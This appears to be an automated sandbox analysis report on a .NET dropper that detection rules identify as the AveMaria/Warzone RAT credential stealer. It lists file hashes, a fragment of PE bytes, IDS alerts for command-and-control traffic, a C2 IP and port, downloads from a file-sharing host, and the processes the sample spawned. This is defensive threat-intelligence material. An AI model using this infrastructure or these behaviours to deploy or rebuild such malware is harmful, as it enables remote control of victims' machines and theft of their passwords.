                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1

                                  C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):1056256
                                  Entropy (8bit):7.998564189235208
                                  Encrypted:true
                                  SSDEEP:24576:fWOJrKG6vIyZCx67yqfQC40xquBsdq8Uz7REU4R9:fWOz6wyU6ML0dsdq8UJB4
                                  MD5:373574C70AB6F299813FDAFA9C12AB9B
                                  SHA1:E6DBFBBE58F87E70DA25F5CD31E526DDBCEB679E
                                  SHA-256:AD8184627690F50DA83D52FA3B92ED2597E279527821FFDEDE20240D19CC3E21
                                  SHA-512:4EC3F08AA83DB8FEDF0ACA9F0FDCB3237AFC35F34BA1ADEE6F3372D4AEC2B544DB5BB892E49F8C8A00A82C10C8BA697FF21D161D44F7695A1EAC132C190E3DD5
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 38%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....c.............................2... ...@....@.. ....................................`..................................2..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................2......H........#...............#......................................................F...-.&(....+.&+.*br...p(.....-.&+......+.*F...,.&(....+.&+.*6.-.+.(....+.*6.-.+.(....+.*6.,.+.(....+.*.~....,.*..-!&(....t,...r...p .......o:...,.+......+.(;...*...0..........~.....-.&......%......-.&&.-.&s.....+...+.(....+...+.s...... ....o..... ....o....(....rm..po.......... ....s........o.....[o....o.......o.....[o....o......o.........o.....s ...........io!.......o".....o#........o".....o"....

                                  C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exe:Zone.Identifier

                                  Download File
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:modified
                                  Size (bytes):26
                                  Entropy (8bit):3.95006375643621
                                  Encrypted:false
                                  SSDEEP:3:ggPYV:rPYV
                                  MD5:187F488E27DB4AF347237FE461A079AD
                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                  Malicious:true
                                  Preview:[ZoneTransfer]....ZoneId=0

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):7.998564189235208
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  • DOS Executable Generic (2002/1) 0.01%
                                  File name:SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  File size:1056256
                                  MD5:373574c70ab6f299813fdafa9c12ab9b
                                  SHA1:e6dbfbbe58f87e70da25f5cd31e526ddbceb679e
                                  SHA256:ad8184627690f50da83d52fa3b92ed2597e279527821ffdede20240d19cc3e21
                                  SHA512:4ec3f08aa83db8fedf0aca9f0fdcb3237afc35f34ba1adee6f3372d4aec2b544db5bb892e49f8c8a00a82c10c8ba697ff21d161d44f7695a1eac132c190e3dd5
                                  SSDEEP:24576:fWOJrKG6vIyZCx67yqfQC40xquBsdq8Uz7REU4R9:fWOz6wyU6ML0dsdq8UJB4
                                  TLSH:17253359A37F8E3DC8853E309B8BD0C8A57B1ED0D9D96264F18C898F5AB60D32B11F51
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c.............................2... ...@....@.. ....................................`................................

                                  File Icon

                                  Icon Hash:00828e8e8686b000

                                  Static PE Info

                                  General

                                  Entrypoint:0x5032ee
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x6385E5A1 [Tue Nov 29 10:57:37 2022 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                  Entrypoint Preview

                                  Instruction
                                  jmp dword ptr [00402000h]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1032a00x4b.text
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1040000x4f8.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1060000xc.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x20000x1012f40x101400False0.9982936254859086data7.999494429591008IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rsrc0x1040000x4f80x600False0.3717447916666667data3.8698428692096263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0x1060000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountry
                                  RT_VERSION0x1040a00x254data
                                  RT_MANIFEST0x1042f40x204XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (513), with no line terminators

                                  Imports

                                  DLLImport
                                  mscoree.dll_CorExeMain

                                  Network Behavior

                                  Snort IDS Alerts

                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  192.168.2.462.102.148.15849698626412852347 11/29/22-16:56:37.231932TCP2852347ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse4969862641192.168.2.462.102.148.158
                                  62.102.148.158192.168.2.462641496982852350 11/29/22-16:56:37.391216TCP2852350ETPRO TROJAN Ave Maria/Warzone RAT ListPasswordsCommand626414969862.102.148.158192.168.2.4
                                  192.168.2.462.102.148.15849698626412852355 11/29/22-16:56:37.392528TCP2852355ETPRO TROJAN Ave Maria/Warzone RAT VNCGetModule4969862641192.168.2.462.102.148.158
                                  192.168.2.462.102.148.15849698626412852352 11/29/22-16:56:37.392528TCP2852352ETPRO TROJAN Ave Maria/Warzone RAT DownloadAndExecuteCommand4969862641192.168.2.462.102.148.158
                                  192.168.2.462.102.148.15849698626412839088 11/29/22-16:56:40.347271TCP2839088ETPRO TROJAN Ave Maria RAT Encrypted CnC KeepAlive Outbound (2)4969862641192.168.2.462.102.148.158
                                  62.102.148.158192.168.2.462641496982852346 11/29/22-16:56:37.208383TCP2852346ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket626414969862.102.148.158192.168.2.4
                                  192.168.2.462.102.148.15849698626412839089 11/29/22-16:56:37.392528TCP2839089ETPRO TROJAN Ave Maria RAT Encrypted CnC Checkin (2)4969862641192.168.2.462.102.148.158
                                  192.168.2.462.102.148.15849698626412852351 11/29/22-16:56:40.347271TCP2852351ETPRO TROJAN Ave Maria/Warzone RAT ListPasswordsResponse4969862641192.168.2.462.102.148.158
                                  62.102.148.158192.168.2.462641496982852354 11/29/22-16:56:38.680309TCP2852354ETPRO TROJAN Ave Maria/Warzone RAT RemoteModuleLoadResponse626414969862.102.148.158192.168.2.4

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Nov 29, 2022 16:55:21.258791924 CET4969580192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:55:21.279797077 CET8049695188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:55:21.279995918 CET4969580192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:55:21.281394958 CET4969580192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:55:21.302222013 CET8049695188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:55:21.351871014 CET8049695188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:55:21.351898909 CET8049695188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:55:21.352025032 CET4969580192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:55:21.398704052 CET49696443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:55:21.398777962 CET44349696188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:55:21.398852110 CET49696443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:55:21.460002899 CET49696443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:55:21.460058928 CET44349696188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:55:21.516864061 CET44349696188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:55:21.516948938 CET49696443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:55:21.522449017 CET49696443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:55:21.522485971 CET44349696188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:55:21.523241997 CET44349696188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:55:21.730907917 CET44349696188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:55:21.731012106 CET49696443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:55:21.965739965 CET49696443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:55:21.965787888 CET44349696188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:55:22.374121904 CET44349696188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:55:22.561184883 CET49696443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:55:22.561218977 CET44349696188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:55:22.565197945 CET49696443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:55:22.601255894 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.601308107 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.601404905 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.602211952 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.602230072 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.654350996 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.654522896 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.668250084 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.668279886 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.668735027 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.672946930 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.672976017 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.956020117 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.956254005 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.956289053 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.956320047 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.956382990 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.956428051 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.956449032 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.956566095 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.956598997 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.956613064 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.956629992 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.956665993 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.956700087 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.956705093 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.956720114 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.956764936 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.957380056 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.957432032 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.957461119 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.957509041 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.957536936 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.957617998 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.958194971 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.958230019 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.958277941 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.958302975 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.958995104 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.959028006 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.959054947 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.959093094 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.959120989 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.959145069 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.959198952 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.959742069 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.959830046 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.959855080 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.959883928 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.959906101 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.961472988 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.967278004 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.972688913 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.972729921 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.972760916 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.972793102 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.972816944 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.972848892 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.972867012 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.972953081 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.973404884 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.973462105 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.973490953 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.973521948 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.973534107 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.974250078 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.974303961 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.974319935 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.974330902 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.974342108 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.975075006 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.975111961 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.975172043 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.975189924 CET44349697188.114.97.3192.168.2.4

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Nov 29, 2022 16:55:21.169269085 CET5657253192.168.2.48.8.8.8
                                  Nov 29, 2022 16:55:21.194606066 CET53565728.8.8.8192.168.2.4
                                  Nov 29, 2022 16:55:21.368020058 CET5091153192.168.2.48.8.8.8
                                  Nov 29, 2022 16:55:21.396821976 CET53509118.8.8.8192.168.2.4
                                  Nov 29, 2022 16:55:22.575531006 CET5968353192.168.2.48.8.8.8
                                  Nov 29, 2022 16:55:22.599168062 CET53596838.8.8.8192.168.2.4
                                  Nov 29, 2022 16:56:45.100804090 CET6416753192.168.2.48.8.8.8
                                  Nov 29, 2022 16:56:45.120352983 CET53641678.8.8.8192.168.2.4
                                  Nov 29, 2022 16:56:45.211761951 CET5856553192.168.2.48.8.8.8
                                  Nov 29, 2022 16:56:45.234453917 CET53585658.8.8.8192.168.2.4
                                  Nov 29, 2022 16:56:45.671900034 CET5223953192.168.2.48.8.8.8
                                  Nov 29, 2022 16:56:45.697882891 CET53522398.8.8.8192.168.2.4

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Nov 29, 2022 16:55:21.169269085 CET192.168.2.48.8.8.80x9ca1Standard query (0)filetransfer.ioA (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:55:21.368020058 CET192.168.2.48.8.8.80x77b4Standard query (0)filetransfer.ioA (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:55:22.575531006 CET192.168.2.48.8.8.80x4146Standard query (0)s23.filetransfer.ioA (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:56:45.100804090 CET192.168.2.48.8.8.80xd143Standard query (0)filetransfer.ioA (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:56:45.211761951 CET192.168.2.48.8.8.80x9144Standard query (0)filetransfer.ioA (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:56:45.671900034 CET192.168.2.48.8.8.80xfc94Standard query (0)s23.filetransfer.ioA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Nov 29, 2022 16:55:21.194606066 CET8.8.8.8192.168.2.40x9ca1No error (0)filetransfer.io188.114.96.3A (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:55:21.194606066 CET8.8.8.8192.168.2.40x9ca1No error (0)filetransfer.io188.114.97.3A (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:55:21.396821976 CET8.8.8.8192.168.2.40x77b4No error (0)filetransfer.io188.114.96.3A (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:55:21.396821976 CET8.8.8.8192.168.2.40x77b4No error (0)filetransfer.io188.114.97.3A (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:55:22.599168062 CET8.8.8.8192.168.2.40x4146No error (0)s23.filetransfer.io188.114.97.3A (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:55:22.599168062 CET8.8.8.8192.168.2.40x4146No error (0)s23.filetransfer.io188.114.96.3A (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:56:45.120352983 CET8.8.8.8192.168.2.40xd143No error (0)filetransfer.io188.114.96.3A (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:56:45.120352983 CET8.8.8.8192.168.2.40xd143No error (0)filetransfer.io188.114.97.3A (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:56:45.234453917 CET8.8.8.8192.168.2.40x9144No error (0)filetransfer.io188.114.97.3A (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:56:45.234453917 CET8.8.8.8192.168.2.40x9144No error (0)filetransfer.io188.114.96.3A (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:56:45.697882891 CET8.8.8.8192.168.2.40xfc94No error (0)s23.filetransfer.io188.114.96.3A (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:56:45.697882891 CET8.8.8.8192.168.2.40xfc94No error (0)s23.filetransfer.io188.114.97.3A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • filetransfer.io
                                  • s23.filetransfer.io

                                  Statistics

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:16:54:27
                                  Start date:29/11/2022
                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  Imagebase:0x150000
                                  File size:1056256 bytes
                                  MD5 hash:373574C70AB6F299813FDAFA9C12AB9B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  Reputation:low

                                  General

                                  Target ID:1
                                  Start time:16:54:28
                                  Start date:29/11/2022
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:"powershell" Get-Date
                                  Imagebase:0x1e0000
                                  File size:430592 bytes
                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Reputation:high

                                  General

                                  Target ID:2
                                  Start time:16:54:28
                                  Start date:29/11/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7c72c0000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:5
                                  Start time:16:55:38
                                  Start date:29/11/2022
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig/release
                                  Imagebase:0xd90000
                                  File size:232960 bytes
                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:6
                                  Start time:16:55:39
                                  Start date:29/11/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7c72c0000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:7
                                  Start time:16:55:39
                                  Start date:29/11/2022
